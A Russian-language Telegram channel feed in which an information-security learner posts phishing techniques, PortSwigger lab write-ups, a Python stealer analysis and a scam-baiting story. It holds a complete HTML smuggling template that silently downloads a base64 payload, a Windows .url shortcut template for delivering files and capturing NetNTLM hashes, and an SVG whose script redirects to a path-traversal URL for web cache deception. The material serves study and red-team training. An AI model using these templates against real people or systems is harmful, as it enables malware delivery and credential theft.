Coffee cube
290 subscribers
121 photos
17 videos
24 files
84 links
Этот канал посвещен моему пути в сфере Информационной безопасности.

Выкладываю статьи по моим исследованиям, райтапы на лабораторные работы и забавные истории. Присоединяйтесь^3

По всем вопросам можете писать мне в ЛС: @ju57_4_cu63
Download Telegram
Media is too big
VIEW IN TELEGRAM
Привет^3

Сегодня я расскажу о другой части моей работы - Phishing.

Фишинг - это отправка мошеннических электронных писем с целью повлиять на жертву или заставить ее предоставить информацию , открытый файл или перейти по ссылкам.

Одной из актуальных техник является HTML Smuggling. Используя HTML5 и JavaScript можно доставить вредоносный файл на хост внутри HTML файла. В нем может содержаться большой бинарный объект JavaScript Blobs.

Blob

Неизменяемый объект, который представляет собой необработанные данные.


var myBlob = new Blob([myData], {type: 'octet/stream'});


Это создает Blob типа MIME octet/stream и заполняет данные, содержащиеся в myData.

Затем создается URL адрес из объекта Blob:


var myUrl = window.URL.createObjectURL(blob);
myAnchror.href = myUrl;


Далее, можно имитировать щелчок на якорном объекте с помощью метода HTMLElement.click():


myAnchor.click()


Пример

В данном примере содержимое файла будет закодировано в base64. В других постах приведу другие примеры для данной техники:3


<html>
<head>
<title>HTML smuggling demo</title>
</head>
<body>
<script>
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}

var file = <!--payload in base64-->
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'payload.txt';

if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>


#phishing@coffee_cube
👨‍💻21🔥1🤝1
Привет^3

Я считают, что отличный вариант названия тех, кто считает себе хакером, после скачивания Kali Linux. Звучит гордо - калисты...

#memes@coffee_cube
😁6🐳2😈1👨‍💻1💅1😎1
OS command injection, simple case.pdf
256.4 KB
Привет^3

Первая из лаб на тему инъекция из поборки от Port Swigger Academy. Достаточно простая для понимания. Далее пойдут SQL инъекции.

#web #writeup
@coffee_cube
🔥21👨‍💻1
This media is not supported in your browser
VIEW IN TELEGRAM
Привет^3

Так как сегодня первая лаба на SQL инъекцию, то я не смог не добавить мем.

А сам разбор в комментах)
https://t.iss.one/coffee_cube/53?comment=90

#web #writeup
@coffee_cube
👍4😁42🔥1👨‍💻1
Привет^3

У меня +1 в коллекцию малвараписчиков на Python)

#memes
@coffee_cube
😁6💅4👨‍💻31🗿1
SQL injection vulnerability allowing login bypass.pdf
125.8 KB
Привет^3

Сегодня выкладывают последнюю райтап на лабу из подборки Server-side vulnerabilities. На днях соберу ссылки на все райтыпы в один список. А в понедельник будет разбор одного малваря на питоне.

#web #writeup
@coffee_cube
11🔥1👨‍💻1
Разбор малваря RedTiger Ste4ler.pdf
262.8 KB
Привет^3

Какое-то время назад ко мне в руки попал стиллер, написанный на Python. Я решил его разобрать. К сожалению не успел посмотреть две функции, которые связаны с Discord. Этим я займусь чуть позже. Потенциально получится найти Discord-канал, на который эти данные сливаются, а также поковырять сайт, где эту тулу продают.

#rev #malware
@coffee_cube
🔥6👨‍💻3👍21🦄1
Exploiting path mapping for web cache deception.pdf
416.2 KB
Привет^3

Данная лаба показывает возможность кэшировать динмаческую страницу, для получения доступа к данным другого пользователя.

Напишите в комментариях: выкладывать разбора лаб на разные темы или последовательно на одну?

#web #writeup
@coffee_cube
🔥31👨‍💻1
Media is too big
VIEW IN TELEGRAM
Привет^3

Сегодня хочу рассказать про интересное расширение для Windows - .url.

Это файл ярлыка, содержащий ссылку на веб-страницу или адрес ресурса в интернете.

С помощью него можно загрузить вредоносный файл на атакуемую машину, а так же есть вариант получить NetNTLMv1/v2 хеши.

Шаблон файла:


[InternetShortcut]
IDList=
URL=<server ip addr>
HotKey=0


Про то, как получить NetNTLM хеши и что с ними делать расскажу позже)

#phishing
@coffee_cube
4🦄2🔥1👨‍💻1
Exploiting path delimiters for web cache deception.pdf
464.4 KB
Привет^3

Тема атаки Web cache deception показалась мне интересной, поэтому дальше буду выкладывать разбора лаб на данную тему.

Оффтоп:

Писали ли вам на счет заработка в интернете связанную с отелями? Мне вот написали) Это 100% скам. Теперь думаю, а что с ними можно сделать? Буду рад вашим предложениям

#web #writeup
@coffee_cube
👨‍💻21🔥1🤝1
Привет^3

Мне кажется, что всю удачу я променял на магнит для скаммеров. И так...

Мне написали с невероятно привлекательным предложением легко заработка в интернете. "Да кем я себя возомнил, чтобы отказаться от этого" - подумал я. Из важных вопросов был возраст и имя. Важно, чтобы возраст был больше 18.

Далее мне описали суть работы. Нужно повышать популярность отлей. Для этого нужно переходить по ссылкам и отправлять скриншоты. Работа не пыльная, смысла в ней тоже мало. Отправил 5 скринов. Теперь нужно связаться с другим менеджером для получения ЗП) Мне выдали код, который является последними 4 цифрами моего номера телефона. Совпадение - не думаю) И вот мне уже обещают 300 р. Перевел их мне на карту какой-то рандомный человек.

На второй день мне предложили зарабатывать "реальные деньги". Подсев на иглу легких денег я согласился) И вот, градус повышается. Теперь нужно бронировать номера, чтобы эмитировать загруженность. "Бронь" будут "отменять", а на   "счет" будет начислен возврат и комиссия. Но для брони нужны деньги, подумает вы. И будете чертовски правы) Поэтому нужно выбрать сумму залога и отправить ее на номер карты ни разу не подозрительно, но да ладно. Я выбрал 570 р. Думаю, что хватит на люкс)) Дальше только интереснее!

Нужно зарегистрироваться на сайте для бронирования https://www.radisson.top/. Внешний вид сайта выглядит ни разу не подозрительно. Очень плохая верстка, никакой валидации логина, почты, номера телефона. Ну это им и не нужно. Дальше нужно играть в игру: жмакаешь на кнопку получения заказа, клацаешь забронировать - все. Профит. Но я же говорил, что мне везет. Так вот, мне выпал чудесный номер за 4500 для бронирования с повышенной комиссией, но, к сожалению, на моем балансе нет денег для оплаты Милорд, нужно больше золота. Бюджет на скамеров был исчерпан.

Итог. Я написал, что у меня нет денег и стал им не интересен. Есть мысль поковырять сайт и, по возможности, найти ручку для увеличения баланса, чтобы вернуться в эту историю для выяснения подробностей. Вся схема похожа на отмывание денег или проделки кардеров. В какой-то момент вас могут просто кинуть на те деньги, что были переведены другим людям. Так же может быть заблокирован ваш счет, если кто-то из жертв пожалуется(у меня есть ощущение, что жертвы сами перекидывают друг-другу деньги). Так же я приучил менеджера открывать pdf файлы, что может пригодиться в будущем.

Будте аккуратны и не ведитесь на легкую наживу)

#memes #story_time
@coffee_cube
🔥54🤡1👨‍💻1👀1💅1
Exploiting_origin_server_normalization_for_web_cache_deception.pdf
421.6 KB
Привет^3

Продолжаю выкладывать райтапы на лабы по Web cache deception.

Код svg файлы вынесу сюда:


<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "https://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg height="100%" version="1.1" viewBox="0 0 1700 863" width="100%" xml:space="preserve"
xmlns="https://www.w3.org/2000/svg" xmlns:xlink="https://www.w3.org/1999/xlink">
<image height="863" id="Image" width="1700" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAIAAAAC64paAAAEz0lEQVR4nAHEBDv7AAxxUTd8YtLTcEaHx40ZIJK60obC5Ou1cLF+TS4/XVlRSmvVi/w8Ca2/8IQgN1t1Vnz2z4Qbhi41a9vUGAAdrSE1KG1/JVhVWHa4MMlbjStnEqyHAJ955H/P5KELCfoLxZfvMBXHOrF5zXHK2FQDizWDvG8AL/aju1MAPftmRhxjuzxxxxwr6/sTuNGCrXbDgrp8f8pF4XXBCEmwevYo0UZcWY8m8y7drro6Fyfn/IZhDuf1Sra3ABF+HBy+0XxXRZPGpTTfOjn2WtbN6h3k3ZDaqjVIrcc2nzDsXX50RAmZWqJP/udjDRsBKoHV1tiUzBeO+AAPUxxJoPg1+LVX0ZGGuREcxlbsasPf3V88wgpJOvEe7/QM9Hygg1HYJEIi0/ELhzseWQyUEVX/5KFxcAYAGGSIkEfp0R2p8/iekqmiWWqmx4UJkbv79HhBPEmjcWrMq6OnnQlOlqlw45AKt7FYqns9bm2RKcaIXJKsAJfNE+IyVXL8eq752OYiBqePXfd5N/yVih9sbDBKGczO78uVB1hJPCV+YBWtBNpQ6vZHOyB5m9oZXr8+sACMrWSnXLEdiLu3S20yGUdFLJU1auqh7OUvMdi6FmGLjkMIz+qDNfLibseIgyNhHJjE5CLZpJ8fmQ/cRd8A7cTTpcVgtzIbWOcASAT8WePb1RfDQtTm7zJrFqLslkdMnDHBHv1w43qYv0EXDx/UTRRav8hpToTpGztfADmSJNLe+I/qQgntVRu+8YHIot93eGUgAAIPBUr/ALoq0TghgQKgT4tVSjOSRqV4Od243GfoLQ4uY+0t1QB5ktSY7avPeAitGgVwZ2YdbC8qijR5JZx6QuVAr87H03yNKyeLR7UMae5XGPLKnjee0NvDCCOQxQcPUMsAZl11CIYce3xIb/xyhTT6wV6H0XOF8My6bnS+WaEVFStSW0zoTRT2eFHMXq45KCN3aOA19/BVG0i9/DPuAP4Z833YYQN+QzXZYagmlb9vBHXZ0MJCBIfvs43jV1l1AXubIPVot5j9K5zkmu9IvFWES9C614mfBoN4dwASTMvwX+y63gzmNUzx1IIzdXJnlTxqJgWAEz8KyKSyOTXY8s5mC0f1H/zDXOIzE5iyGG1RODjQCJFLLOwA6+J5ZIlRkIXofOGOoHfNWGHZ2kH1c2ueLcw1T57fSw5D1/9n05ZeUUWpKLEYwCws8jAZm2/01M9bxbX5AGgdzTS6EW7F2YduQvY4YmfEYJ2XznsR3mU9L4ecSPLKCzuIAqkL9hN8eYlQwKAhhTFHqM15tRk6m6iR0wD2wNoLzCWjhF2SE67i0iEH/WGUt7KhRDiDslK6+KtX+tAVfSUi+NGE8JHUYjjotuk9eGKf+y0AvQcCJn0AtyEQZ5F//iLAZ1YdBSZ2K6+UXohWsjyz/5eVXJs45k3l85Lwxi/9rStDJCrpJ1Qul5wvG/juezX0KX23ADCzfLib3CQrgKhayon7oOZULnNkgKgkbIqgvqpzPVCRbTCgOi5lO6e/iSSFL3tlJYNrP1q4HBrF7MAEeQAUThoWm+8dYpYVW6ZKsNj8De13cqJXziBtn3iNoc60ZkmD3x0IcwQG+tKp/a3eGmz6dWpiv/Mm0G5hl0xSGlKET0w0lQAAAABJRU5ErkJggg=="/>
<script type="text/javascript">
<![CDATA[
document.location="https://0aef000f03f69da48140110400a500fc.web-security-academy.net/resources/123/..%2f..%2fmy-account"
]]>
</script>
</svg>


#web #writeup
@coffee_cube
👨‍💻2🦄2👍1🔥1😎1
Привет^3

Мне не нравится экспорт markdown в pdf, поэтому сегодня попробую загрузить отчет через github. Продолжаю выкладывать разборы лаб направленных на кэширование динамических ресурсов. Отпишите в комменты, если так читать удобнее.

✏️разбор

#web #writeup
@cofee_cube
🔥3👍211👨‍💻1